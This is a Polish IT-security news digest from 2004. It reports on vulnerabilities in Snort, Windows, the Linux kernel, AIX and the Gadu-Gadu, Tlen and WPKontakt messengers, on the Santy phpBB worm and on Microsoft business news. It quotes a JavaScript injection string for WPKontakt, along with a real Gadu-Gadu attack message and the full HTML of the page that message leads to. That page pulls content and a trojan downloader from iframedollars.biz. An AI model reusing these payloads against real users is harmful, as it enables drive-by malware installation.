2004

Marcin Zgorecki poinformował o wykryciu luki w popularnym systemie wykrywania włamań – Snort. Błąd umożliwia atakującemu wykonanie ataku typu Denial of Service na usługę.

Przeprowadzenie ataku umożliwia luka w drukowaniu poprzez TCP/IP. Wysłanie odpowiednio spreparowanego pakietu doprowadzi do załamania działania usługi.

Wykorzystanie podatności jest możliwe, gdy Snort jest skonfigurowany z opcją „FAST” lub działa w trybie verbose.

Podatność dotyczy wszystkich wersji do wydania 2.2.10. Zalecamy natychmiastowe uaktualnienie do wersji 2.3.0-RC1.

Źródło informacji: Secunia.com

W sieci opublikowano informacje o nowych lukach w systemach Windows NT/2000/XP/2003. Mogą być wykorzystane do przejęcia zdalnej kontroli nad systemem.

Jeden z błędów to przekroczenie zakresu liczb całkowitych w LoadImage API, dzięki któremu atakujący może odpowiednio spreparować bitmapy, ikony oraz animowane kursory (pliki z rozszerzeniem .BMP, .CUR, .ICO oraz .ANI) i wykorzystać je za pośrednictwem strony WWW lub poczty HTML do zdalnego wykonania polecenia. Luka ta nie dotyczy XP SP2.

Drugi błąd to przepełnienie sterty w winhlp32.exe (Windows Help). Luka występuje podczas przetwarzania (dekodowania) plików pomocy Windows .hlp. Według opublikowanych informacji, luka dotyczy także Windows XP SP2. Zaleca się więc instalowanie nowych plików pomocy tylko z zaufanych źródeł.

Trzecia luka to błąd w jądrze podczas przetwarzania plików ANI i jej efektem może być zamknięcie systemu (atak denial of service). Podobnie jak pierwszą z luk, atakujący może ją wykorzystać za pomocą strony WWW lub poczty HTML do wykonywania zdalnych poleceń. Luka nie dotyczy XP SP2.

Na dzień dzisiejszy Microsoft nie opublikował łaty na żadną z powyższych luk. W sieci pojawił się kod „proof of concept” na powyższe luki.

Źródło informacji: CERT Polska

Dzisiaj w nocy został podmieniony przez grupę dNw team jeden z podserwerów TP.Internet – isp11.tpi.pl. Dodatkowo na ten sam serwer można dostać się poprzez alias: www.i-pl.org. Standardowo podmieniona strona w dziale hacked.

Znany tropiciel błędów Georgi Guninski kilka dni temu poinformował o odkryciu trzech błędów w jądrze systemowym Linuksa, których wykorzystanie może doprowadzić do ataku denial of service.

Błędy dotyczą przepełnienia liczby całkowitej w funkcjach ip_options_get() i vc_resize() oraz wycieku pamięci w funkcji ip_options_get(), zaś na atak podatne są wersje jądra z serii 2.6 do wersji 2.6.9 oraz z serii 2.4 do wersji 2.4.28.

Szczegółowe informacje wraz z przykładami dostępne są tutaj.

W ciągu niespełna tygodnia w znanym i dość popularnym komunikatorze Gadu-Gadu wykryto kilka poważnych błędów, które pozwalały wywołać zewnętrzny kod, wykraść dane z komputera ofiary a nawet zawiesić aplikację. Niestety jak się okazuje oprócz komunikatora Gadu-Gadu inne również znane komunikatory jak Tlen oraz WPKontakt posiadają błędy.

Komunikator Tlen oraz WPKontakt również podatne są na ten sam błąd, co Gadu-Gadu. Jak już wiadomo błąd pozwala na przesłanie do użytkownika dowolny łańcuch znaków który może być dowolnym adresem internetowym, a w nim może „ukrywać” się kod javascript bądź też odnośnik do pliku z kodem który ma wykonać się na komputerze ofiary.

W komunikatorze WPKontakt błąd objawiał się podczas wyświetlania adresów e-mail umożliwiający potencjalnemu atakującemu wykonanie kodu JavaScript przez wysłanie specjalnie spreparowanej wiadomości.

Przykładem takiej odpowiednio spreparowanej wiadomości może być:

test@”style=”background-image:url(javascript:alert(%22You%20are%20owned!%22>))”.wp.pl

Zarówno ostatnia wersja komunikator WPKontakt 3.0.1pl oraz komunikatora Tlen 5.23.4.2 posiadają stosowne poprawki zabezpieczające użytkownika przed tego typu atakiem, a więc osoby korzystające z ów komunikatorów powinny jak najszybciej zaopatrzyć się w aktualną wersję.

Zobacz również:
– Exploit rozsyłany w sieci Gadu-Gadu
– Dwa nowe błędy w Gadu-Gadu
– Kolejne bardzo poważne błędy w Gadu-Gadu

21 grudnia pojawił się w sieci nowy robak – Santy. Rozprzestrzenia się poprzez błąd w phpBB. Szacuje się, że dotychczas zainfekował ponad 40 tys. komputerów.

Santy wykorzystuje lukę w phpBB – popularnym darmowym pakiecie służącym m.in. do tworzenia forów dyskusyjnych. Błąd ten, dotyczący wersji do 2.0.10, opublikowany został w listopadzie, jednak do tej pory bardzo wiele systemów nie zostało załatanych. Dotyczy on funkcji urldecode i poprzez SQL Injection umożliwia wykonanie na atakowanym komputerze dowolnego kodu php.

Robak napisany jest w perlu. Jego działanie polega na wyszukaniu poprzez Google serwerów na których obecny jest plik viewtopic.php. Następnie robak rozpoczyna atak na komputery z tak wygenerowanej listy. W przypadku sukcesu, nadpisuje pliki z rozszerzeniami asp, htm, jsp, php, phtm i shtm tekstem: This site is defaced!!! NeverEverNoSanity WebWorm generation X.

Jakkolwiek użytkownicy najpopularniejszej wyszukiwarki internetowej nie są bezpośrednio podatni na atak, Google na wniosek firm produkujących oprogramowanie antywirusowe wprowadziło blokady zapytań kierowanych przez robaka.

Serwery korzystające z mechanizmów phpBB powinny zostać jak najszybciej załatane. Nawet w przypadku wygasania działalności robaka, są one wciąż podatne na exploity, które są łatwo dostępne w sieci.

Uaktualnienia phpBB (do wersji 2.0.11) dostępne są pod tym adresem. O robaku Santy przeczytać można m.in. w biuletynie US CERT i w opisie firmy Symantec.

Źródło informacji: CERT Polska

Microsoft wprowadza wersję testową systemu operacyjnego Windows x64 Release Candidate 1. Nowy produkt, wyposażony w 16 terabajtów pamięci wirtualnej, pozwoli programistom tworzyć nowe, bardziej wydajne i efektywne aplikacje. Windows x64 RC 1 zaprojektowano dla procesorów Athlon 64 i Opteron AMD64 firmy Advanced Micro Devices oraz Pentium 4 i Xeon z technologią Extended Memory 64 Technology firmy Intel.

Nowy Windows x64 RC1 zawiera 64-bitowe wersje Windows XP Professional oraz Windows Server 2003 x64. System Windows x64 jest kompatybilny zarówno z 64-bitowymi, jak i 32-bitowymi aplikacjami, oferuje jednak dodatkowe możliwości niedostępne dla komputerów starszej generacji. Dzięki procesorom 64-bitowym użytkownik może korzystać z wersji Windows x86 i x64 na tym samym sprzęcie komputerowym.

„Przejście na technologię 64-bitową daje 16-cie terabajtów czystej przestrzeni adresowej, gdzie system operacyjny umieszcza dane i programy. Zostaną zniesione limity istniejące dla adresów 32-bitowych. Nowe systemy będą wykazywać się również znaczącą szybkością, co wpłynie na istotna redukcje czasu potrzebnego do tworzenia nowych narzędzi” – powiedział Krzysztof Florczak, Windows Client Business Group Lead z Microsoft Polska.

Przewiduje się, że systemy 64 – bitowe będą już w najbliższych latach ogólnie obowiązującym standardem. Wskazuje na to cena sprzętu komputerowego z 64 – bitowym systemem operacyjnym, zbliżająca się do poziomu kosztu zakupu sprzętu 32 – bitowego. Już dzisiaj w USA w niektórych większych sklepach można nabyć sprzęt 64 – bitowy i 32 – bitowy w podobnej cenie.

Microsoft przegrał pierwsze odwołanie przed Europejskim Trybunałem Sprawiedliwości, który podtrzymał grzywnę nałożoną przez Komisję Europejską za praktyki monopolistyczne amerykańskiej korporacji.

Grzywna wynosi 479 mln euro i została wymierzona za nieprzestrzeganie przez Microsoft przepisów o wolnej konkurencji. Orzeczenie Trybunału nie jest wiążące i podlega zaskarżeniu przez obie strony.

Dla przypomnienia Microsoft zapłacił grzywnę w lipcu, a odwołanie wniósł w czerwcu.

Komisja zobowiązała Microsoft do przedstawienia „pełnych i dokładnych” informacji o swym oprogramowaniu dla serwerów, aby twórcy konkurencyjnego software’u mogli zapewnić pełną zgodność swoich produktów z serwerami i PC-tami używającymi produktów Microsoftu.

Ponadto Komisja nakazała korporacji wypuszczenie na rynek oprogramowania systemu operacyjnego Windows bez aplikacji multimedialnej – Media Player, służącej odtwarzaniu plików audio i wideo.

Nałożona na Microsoft grzywna jest najwyższą karą, jaką władze unijne nałożyły dotąd na firmę winną praktyk monopolistycznych.

Źródło informacji: BBC

Cztery dni temu informowaliśmy o kolejnych błędach w komunikatorze Gadu-Gadu. Jeden z nich pozwalał między innymi na wykonanie kodu javascript w strefie lokalnej poprzez wysłanie odpowiednio spreparowanej wiadomości. W dniu dzisiejszym w sieci Gadu-Gadu rozsyłana jest wiadomość której odebranie powoduje instalacje trojana Qhost.

Wiadomość rozsyłana jest z bramki WWW – GG o numerze 7021349. Oto jej treść:

www.po”style=background-image:url(javascript:window.open(‚http://iframedollars.biz/dl/adv407.php’,”,’left=10000′));”.pl

W pliku adv407.php znajduje się kod HTML:

<html><head>
</head><body>
<textarea cd=”cxw” style=”display:none;” >
<object data=”${PR}” type=”text/x-scriptlet”></object>
</textarea>

<script language=”javascript”>
document.write(cxw.value.replace(/\${PR}/g,’ms-its:mhtml:file://c:\\nosuch.mht!http://iframedollars.biz/dl/adv407/x.chm::/x.htm’));
</script>
<applet width=1 height=1 ARCHIVE=loaderadv407.jar code=Counter></APPLET></body></html>

Aplet zapisany w archiwum loaderadv407.jar pobiera program http://iframedollars.biz/dl/loadadv407.exe i instaluje go na komputerze ofiary. Loadadv407.exe przez skaner Mks’a identyfikowany jest jako Trojan.Qhost.

Zalecamy niezwłoczną aktualizacje do najnowszej wersji klienta Gadu-Gadu bądź skorzystanie z alternatywnych klientów.

W sieci pokazały się dwa exploity na wykryte na początku listopada luki w systemie AIX. Użytkownicy tego systemu powinni natychmiast go uaktualnić.

Luki spowodowane są błędami w komendach diag i paginit i mogą być, w prosty sposób, wykorzystane przez użytkownika lokalnego w celu uzyskania uprawnień root. Pierwsza luka dotyczy możliwości uruchomienia dowolnego programu (w tym powłoki systemowej) poprzez programy z ustawionym bitem SETUID, druga – poprzez przepełnienie bufora.

IBM wydał uaktualnienia systemu AIX. Opis i poprawki dostępne są tutaj oraz tutaj (dla wersji AIX 5.3, dla innych są odnośniki w sekcji „APAR Information”).

Źródło informacji: CERT Polska